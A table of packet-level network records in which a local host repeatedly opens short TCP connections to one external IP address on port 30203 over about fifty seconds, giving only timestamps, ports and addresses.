Dec 12, 2024 17:34:27.842690945 CET	30203	49719	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:27.842824936 CET	49719	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:27.962564945 CET	30203	49719	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:29.129136086 CET	30203	49719	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:29.129314899 CET	49719	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:29.129556894 CET	49719	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:29.242646933 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:29.249289989 CET	30203	49719	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:29.362504005 CET	30203	49725	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:29.362711906 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:29.363306046 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:29.483195066 CET	30203	49725	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:29.483288050 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:29.603305101 CET	30203	49725	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:30.823414087 CET	30203	49725	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:30.823487997 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:30.823661089 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:30.929339886 CET	49731	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:31.131815910 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:31.174575090 CET	30203	49725	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:31.174601078 CET	30203	49731	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:31.174798965 CET	49731	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:31.175527096 CET	49731	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:31.252778053 CET	30203	49725	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:31.253035069 CET	49725	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:31.295253992 CET	30203	49731	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:31.295514107 CET	49731	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:31.415230036 CET	30203	49731	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:32.543534040 CET	30203	49731	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:32.543649912 CET	49731	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:32.543956995 CET	49731	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:32.650557995 CET	49736	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:32.664380074 CET	30203	49731	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:32.770334005 CET	30203	49736	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:32.770414114 CET	49736	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:32.771186113 CET	49736	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:32.892371893 CET	30203	49736	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:32.892426014 CET	49736	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:33.012147903 CET	30203	49736	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:34.213676929 CET	30203	49736	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:34.213785887 CET	49736	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:34.213996887 CET	49736	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:34.320877075 CET	49742	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:34.333837032 CET	30203	49736	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:34.440834045 CET	30203	49742	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:34.440937996 CET	49742	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:34.441669941 CET	49742	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:34.561530113 CET	30203	49742	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:34.561603069 CET	49742	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:34.681458950 CET	30203	49742	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:35.779455900 CET	30203	49742	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:35.779620886 CET	49742	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:35.779942989 CET	49742	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:35.882422924 CET	49748	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:35.900937080 CET	30203	49742	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:36.003424883 CET	30203	49748	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:36.003505945 CET	49748	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:36.004165888 CET	49748	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:36.123819113 CET	30203	49748	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:36.123905897 CET	49748	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:36.243665934 CET	30203	49748	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:37.505369902 CET	30203	49748	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:37.508682013 CET	49748	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:37.513801098 CET	49748	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:37.617041111 CET	49755	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:37.633727074 CET	30203	49748	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:37.737418890 CET	30203	49755	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:37.737554073 CET	49755	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:37.738204002 CET	49755	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:37.857928038 CET	30203	49755	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:37.858092070 CET	49755	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:37.977940083 CET	30203	49755	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:39.051065922 CET	30203	49755	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:39.051218987 CET	49755	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:39.051373959 CET	49755	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:39.163636923 CET	49756	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:39.172216892 CET	30203	49755	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:39.284275055 CET	30203	49756	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:39.284406900 CET	49756	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:39.285043955 CET	49756	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:39.404809952 CET	30203	49756	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:39.405023098 CET	49756	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:39.525604963 CET	30203	49756	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:40.932615042 CET	30203	49756	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:40.932742119 CET	49756	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:40.939744949 CET	49756	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:41.055625916 CET	49762	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:41.059431076 CET	30203	49756	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:41.175271034 CET	30203	49762	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:41.175385952 CET	49762	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:41.176083088 CET	49762	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:41.295844078 CET	30203	49762	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:41.296111107 CET	49762	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:41.415822029 CET	30203	49762	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:42.579724073 CET	30203	49762	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:42.579921961 CET	49762	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:42.580009937 CET	49762	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:42.695270061 CET	49768	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:42.699785948 CET	30203	49762	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:42.815148115 CET	30203	49768	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:42.815331936 CET	49768	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:42.816376925 CET	49768	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:42.936216116 CET	30203	49768	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:42.936547995 CET	49768	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:43.056457996 CET	30203	49768	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:44.196733952 CET	30203	49768	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:44.196820021 CET	49768	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:44.218266964 CET	49768	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:44.338130951 CET	30203	49768	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:44.339320898 CET	49770	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:44.459254026 CET	30203	49770	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:44.459441900 CET	49770	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:44.460547924 CET	49770	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:44.580459118 CET	30203	49770	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:44.580626011 CET	49770	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:44.701766014 CET	30203	49770	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:45.791533947 CET	30203	49770	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:45.791639090 CET	49770	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:45.791745901 CET	49770	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:45.898063898 CET	49776	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:45.911604881 CET	30203	49770	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:46.018462896 CET	30203	49776	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:46.019182920 CET	49776	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:46.019804001 CET	49776	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:46.142373085 CET	30203	49776	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:46.142621994 CET	49776	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:46.262573957 CET	30203	49776	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:47.517342091 CET	30203	49776	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:47.517571926 CET	49776	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:47.517735004 CET	49776	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:47.632545948 CET	49782	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:47.637547970 CET	30203	49776	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:47.753315926 CET	30203	49782	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:47.753427029 CET	49782	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:47.754087925 CET	49782	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:47.875739098 CET	30203	49782	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:47.875796080 CET	49782	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:47.997430086 CET	30203	49782	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:49.100605011 CET	30203	49782	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:49.100686073 CET	49782	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:49.100835085 CET	49782	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:49.210630894 CET	49784	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:49.222718954 CET	30203	49782	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:49.330554008 CET	30203	49784	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:49.330676079 CET	49784	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:49.331722021 CET	49784	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:49.451637983 CET	30203	49784	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:49.451683044 CET	49784	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:49.571470976 CET	30203	49784	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:50.794749975 CET	30203	49784	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:50.794869900 CET	49784	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:50.833444118 CET	49784	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:50.953071117 CET	30203	49784	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:50.955302000 CET	49789	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:51.075124979 CET	30203	49789	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:51.075205088 CET	49789	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:51.076370955 CET	49789	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:51.196223021 CET	30203	49789	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:51.196374893 CET	49789	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:51.316200972 CET	30203	49789	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:52.395180941 CET	30203	49789	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:52.395243883 CET	49789	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:52.395384073 CET	49789	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:52.507448912 CET	49795	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:52.514990091 CET	30203	49789	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:52.627405882 CET	30203	49795	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:52.628424883 CET	49795	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:52.629103899 CET	49795	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:52.748790979 CET	30203	49795	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:52.750777006 CET	49795	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:52.870857000 CET	30203	49795	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:53.983048916 CET	30203	49795	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:53.983119965 CET	49795	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:53.983427048 CET	49795	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:54.102118015 CET	49801	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:54.103393078 CET	30203	49795	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:54.222048998 CET	30203	49801	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:54.222138882 CET	49801	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:54.223025084 CET	49801	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:54.342710018 CET	30203	49801	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:54.342925072 CET	49801	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:54.462722063 CET	30203	49801	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:55.575366020 CET	30203	49801	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:55.575620890 CET	49801	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:55.575661898 CET	49801	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:55.679336071 CET	49803	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:55.696760893 CET	30203	49801	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:55.799586058 CET	30203	49803	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:55.799691916 CET	49803	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:55.800476074 CET	49803	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:55.922192097 CET	30203	49803	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:55.922266006 CET	49803	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:56.042969942 CET	30203	49803	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:57.131442070 CET	30203	49803	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:57.131560087 CET	49803	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:57.132078886 CET	49803	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:57.242211103 CET	49808	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:57.251913071 CET	30203	49803	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:57.362432003 CET	30203	49808	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:57.364703894 CET	49808	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:57.365592003 CET	49808	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:57.485887051 CET	30203	49808	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:57.486658096 CET	49808	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:57.606441975 CET	30203	49808	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:58.873063087 CET	30203	49808	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:58.873159885 CET	49808	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:58.873349905 CET	49808	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:58.976231098 CET	49814	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:58.993202925 CET	30203	49808	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:59.096548080 CET	30203	49814	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:59.096676111 CET	49814	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:59.097496033 CET	49814	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:59.219405890 CET	30203	49814	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:59.219512939 CET	49814	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:59.339418888 CET	30203	49814	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:00.431828976 CET	30203	49814	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:00.431900024 CET	49814	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:00.432050943 CET	49814	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:00.539225101 CET	49817	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:00.551729918 CET	30203	49814	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:00.661328077 CET	30203	49817	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:00.662297964 CET	49817	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:00.662297964 CET	49817	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:00.784667969 CET	30203	49817	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:00.787791967 CET	49817	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:00.907612085 CET	30203	49817	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:02.019114971 CET	30203	49817	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:02.020653009 CET	49817	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:02.021850109 CET	49817	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:02.141722918 CET	30203	49817	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:02.155242920 CET	49821	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:02.275095940 CET	30203	49821	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:02.275295973 CET	49821	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:02.292546034 CET	49821	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:02.412312031 CET	30203	49821	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:02.412386894 CET	49821	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:02.532402039 CET	30203	49821	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:03.593696117 CET	30203	49821	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:03.594958067 CET	49821	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:03.594958067 CET	49821	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:03.710827112 CET	49826	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:03.714905024 CET	30203	49821	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:03.830837011 CET	30203	49826	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:03.832717896 CET	49826	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:03.833601952 CET	49826	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:03.953396082 CET	30203	49826	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:03.953497887 CET	49826	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:04.073441029 CET	30203	49826	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:05.169013977 CET	30203	49826	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:05.169105053 CET	49826	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:05.169312000 CET	49826	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:05.288861036 CET	49831	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:05.289139986 CET	30203	49826	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:05.408799887 CET	30203	49831	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:05.409063101 CET	49831	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:05.409857988 CET	49831	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:05.529726028 CET	30203	49831	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:05.529858112 CET	49831	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:05.649671078 CET	30203	49831	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:06.739434004 CET	30203	49831	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:06.739600897 CET	49831	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:06.739825010 CET	49831	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:06.859726906 CET	30203	49831	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:07.095149040 CET	49835	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:07.215116024 CET	30203	49835	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:07.215204954 CET	49835	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:07.216007948 CET	49835	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:07.336275101 CET	30203	49835	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:07.336404085 CET	49835	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:07.456157923 CET	30203	49835	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:08.537297010 CET	30203	49835	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:08.537626028 CET	49835	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:08.537915945 CET	49835	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:08.648478985 CET	49840	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:08.658531904 CET	30203	49835	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:08.768467903 CET	30203	49840	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:08.768547058 CET	49840	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:08.769192934 CET	49840	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:08.888958931 CET	30203	49840	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:08.889082909 CET	49840	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:09.008938074 CET	30203	49840	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:10.235027075 CET	30203	49840	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:10.235260963 CET	49840	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:10.236008883 CET	49840	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:10.351296902 CET	49845	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:10.356595039 CET	30203	49840	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:10.475478888 CET	30203	49845	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:10.475615978 CET	49845	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:10.508768082 CET	49845	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:10.628566027 CET	30203	49845	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:10.628634930 CET	49845	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:10.748578072 CET	30203	49845	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:11.817862034 CET	30203	49845	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:11.818031073 CET	49845	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:11.818192005 CET	49845	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:11.929574013 CET	49851	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:11.938357115 CET	30203	49845	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:12.049396992 CET	30203	49851	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:12.049521923 CET	49851	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:12.050297022 CET	49851	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:12.171824932 CET	30203	49851	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:12.171892881 CET	49851	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:12.292380095 CET	30203	49851	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:13.527648926 CET	30203	49851	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:13.527909040 CET	49851	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:13.528628111 CET	49851	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:13.632517099 CET	49855	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:13.648864031 CET	30203	49851	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:13.752556086 CET	30203	49855	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:13.752700090 CET	49855	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:13.753515959 CET	49855	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:13.873753071 CET	30203	49855	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:13.874021053 CET	49855	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:13.993765116 CET	30203	49855	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:15.101528883 CET	30203	49855	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:15.101603031 CET	49855	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:15.101742983 CET	49855	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:15.210786104 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:15.221756935 CET	30203	49855	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:15.330909014 CET	30203	49860	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:15.332694054 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:15.333451986 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:15.453295946 CET	30203	49860	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:15.453356028 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:15.574284077 CET	30203	49860	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:16.673681021 CET	30203	49860	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:16.673747063 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:16.673870087 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:16.788777113 CET	49865	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:16.975507975 CET	49860	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:35:17.084464073 CET	30203	49860	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:17.084749937 CET	30203	49865	181.131.217.244	192.168.2.6
Dec 12, 2024 17:35:17.084839106 CET	49865	30203	192.168.2.6	181.131.217.244
